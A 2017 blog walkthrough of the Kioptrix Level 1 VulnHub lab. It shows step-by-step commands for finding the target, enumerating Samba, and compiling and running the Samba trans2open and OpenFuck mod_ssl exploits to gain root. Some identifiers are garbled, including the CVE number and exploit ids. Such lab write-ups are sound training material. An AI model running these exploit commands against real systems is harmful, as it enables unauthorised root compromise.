Penetration testing

Kioptrix: Level 1 - Walkthrough

Kioptrix: Level 1 surfaced on VulnHub on February 17^th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root's email.

For the attacking machine, I will be using Kali 2017.1.

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Download Now

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let's start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

Port 22 - Running OpenSSH
Port 80 - Running Apache Web server
Port 111 - Running RPC
Port 139 - Running Samba
Port 443 - Running Apache. We server over ssl
Port 1024 - Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I am given the final file proper permissions:

$ chmod 755 samba

Let's dry run the exploit and see what all parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:

While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was via exploit mod_ssl (CVE 2002 - 0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.

Let's exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

Posted: May 15, 2017

Chiragh Dewan

View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.